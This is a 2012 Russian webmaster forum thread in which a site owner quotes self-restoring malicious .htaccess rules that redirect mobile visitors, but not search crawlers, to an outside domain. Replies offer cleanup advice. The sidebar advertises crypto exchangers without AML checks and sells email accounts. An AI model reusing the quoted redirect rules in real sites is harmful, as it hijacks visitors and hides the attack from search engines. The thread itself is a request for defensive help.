Странный вирус на сайте (самовосстанавливающийся)
Страницы: 1
Странный вирус на сайте (самовосстанавливающийся), .htaccess (мобильная переадресация)
Доброго времени суток уважаемые форумчане. Столкнулся с проблемой: случайно заметил вредоносный код на сайте, который располагался в файле .htaccess, оказалось, что это вредоносный код, содержимое:
Цитата


RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer)    [NC]
RewriteRule    (.*)    http://mr-update.com/u/6484    [L,R=302]

Код при удалении автоматически восстанавливается. Хостер посоветовал сменить данные FTP, обновить движки, проверить свой PC на наличие вирусов, просмотреть лишние файлы на фтп. Все это выполнил - результата 0, код по-прежнему восстанавливается, более того на хостинге 16 сайтов ираспространяется код на все сайты (движки на сайтах разные). Суть кода такова- мобильная переадресация. Яндекс начал банить сайты, трафик резко упал, теперь с яндекса 1-2 перехода, при 100-200 до взлома. Пожалуйста помогите решить данную проблему...
Заработок на продаже качественных ссылок 16.540 р. ежемесячно Сайт: ТИЦ 10»ТУТ« + СКРИНШОТЫ! Не SAPE!
посмотрите логи входа на аккаунт , может нет толку от смены фтп, у вас сам аккаунт взломан, либо почта
просмотрите все ваши .js файлы, как правило в самом низу есть зашифрованная сторка, нужно чистить сразу все, иначе он так и будет распространятся
Изменено: Сергей Макаренко - 16 Декабря 2012 14:08
Неделю назад таким же  маялся.  Помимо перенаправлений в htaccess,  нашёл PHP Shell на сайте у себя, генерировал по 15 невидимых ссылок на всех страницах на какой-то американский сайт по кредитам. Пришлось просить хостера сделать откат и конечно сменить все пароли-логины фттп.
revisium.com/ai/]Сдесь не смотрели? Мне помогло найти дыру на сайте.
Пол года назад такое было. Жалко не могу пример привести. Влезла зараза в код яндекс метрики и где-то ещё сверху, вот уже не помню что..ищите отличие от бекапа. Всё почистил, убил уйму времени, всё сменил, что можно было и живёт сайт. Хостер тоже сказал, что с вирусом пришло, а касперский мой значит проспал.
Компьютер проверьте хорошо. У меня скорее всего через почту прилетело. Будет заскакивать каждый раз, когда входить в fttp будете под логином.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
20:57 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
14:13 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
13:38 2Index - быстрая индексация страниц сайта и обратных ссылок 
12:44 РСЯ и тормоза сайта: Яндекс начал штрафовать за плохой PageSpeed? 
23:09 Как безопасно купить Гугл почту? 
13:45 Какой движок выбрать для форума? 
13:43 Нашел скрины выплат с Сапы за 2010 год. Пошел плакать 
05:29 Продам обменник криптовалюты, а также новый обменник под ключ с обучением. Скидки на скрипты обменника 
04:20 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
23:26 Sova.gg - надежный обменник криптовалюты. 
19:23 Mixmasters - Exchange without AML and KYC 
15:54 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
14:05 TETChange-Обменник криптовалют 
12:36 Nexulume.com Обменник без AML и KYC 
06:50 Точные прогнозы на футбол 
06:06 Moltbook: Соцсеть для ботов, где людям закрыли рот. Началось? 
02:12 Ставки на супер тренды в спорте 
22:31 [AI] Бот за $600к советовал есть сыр с крысами. Нью-Йорк его (наконец-то) снес 
13:38 Осталось 3-5 месяцев до блокировки YouTube в России, — заявил Клименко 
07:11 Список обновленных тем пуст... 
17:02 Gartner обещал смерть SEO к 2026 году. Открываем метрику и проверяем